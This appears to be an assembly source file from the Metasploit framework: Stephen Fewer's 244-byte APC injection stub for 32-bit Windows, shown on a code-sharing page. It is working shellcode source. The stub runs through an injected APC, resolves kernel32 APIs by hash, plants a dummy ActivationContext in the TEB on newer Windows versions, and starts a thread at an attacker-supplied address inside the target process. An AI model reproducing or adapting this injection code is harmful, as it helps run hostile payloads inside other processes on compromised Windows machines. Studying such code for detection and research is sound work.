Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;-----------------------------------------------------------------------------;
2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
4
; Architecture: x86 (but not wow64)
5
; Version: 2.0 (March 2010)
6
; Size: 244 bytes
7
; Build: >build.py apc
8
;-----------------------------------------------------------------------------;
9

10
; A small stub to be used for thread injection where we gain execution via an injected APC. See the
11
; file "\msf3\external\source\meterpreter\source\common\arch\win\i386\base_inject.c" for more details
12

13
;typedef struct _APCCONTEXT
14
;{
15
; 	union
16
;	{
17
;		LPVOID lpStartAddress;
18
;		BYTE bPadding1[8]; 
19
;	} s;
20
;	union
21
;	{
22
; 		LPVOID lpParameter;
23
;		BYTE bPadding2[8];
24
;	} p;
25
;   BYTE bExecuted;
26
;} APCCONTEXT, * LPAPCCONTEXT;
27

28
[BITS 32]
29
[ORG 0]
30

31
  cld                      ; Clear the direction flag.
32
  mov esi, [esp+4]         ; ESI is a pointer to our apc stub context
33
  push ebp                 ; Prologue, save EBP...
34
  mov ebp, esp             ; And create a new stack frame
35
  call start               ; Call start, this pushes the address of 'api_call' onto the stack.
36
delta:                     ;
37
%include "./src/block/block_api.asm" ;
38
start:                     ;
39
  pop ebx                  ; Pop off the address of 'api_call' for calling later.
40
  cmp byte [esi+16], 0     ; Has this context allready been injected
41
  jne cleanup              ; If so just leave this APC
42
  mov byte [esi+16], 1     ; Otherwise mark the context as executed and proceed
43
  push 0x9DBD95A6          ; hash( "kernel32.dll", "GetVersion" )
44
  call ebx                 ; GetVersion(); (AL will = major version and AH will = minor version)
45
  cmp al, byte 6           ; If we are not running on Windows Vista, 2008 or 7
46
  jl short continue        ; then continue to CreateThread... otherwise we must create a dummy thread ActivationContext
47
  xor ecx, ecx             ; zero ECX
48
  mov eax, [fs:ecx+24]     ; Get the current TEB
49
  cmp dword [eax+424], ecx ; Is the TEB ActivationContextStackPointer pointer NULL?
50
  jne continue             ; If there already is an ActivationContext structure setup, just continue
51
  lea edx, [ebx+context-delta] ; calculate the address of our dummy ActivationContext
52
  mov dword [eax+424], edx ; and set the address of our dummy ActivationContext in the current TEB
53
continue:
54
  xor ecx, ecx             ; Clear ECX
55
  push ecx                 ; lpThreadId 
56
  push ecx                 ; dwCreationFlags
57
  push dword [esi+8]       ; ctx->lpParameter
58
  push dword [esi]         ; ctx->lpStartAddress
59
  push ecx                 ; dwStackSize
60
  push ecx                 ; lpThreadAttributes
61
  push 0x160D6838          ; hash( "kernel32.dll", "CreateThread" )
62
  call ebx                 ; CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL );
63
cleanup:
64
  leave                    ; epilogue
65
  retn 12                  ; Return (cleaning up stack params) and finish our APC routine.
66
context:
67
  TIMES 0x18 db 0          ; An empty ntdll!_ACTIVATION_CONTEXT_STACK structure
68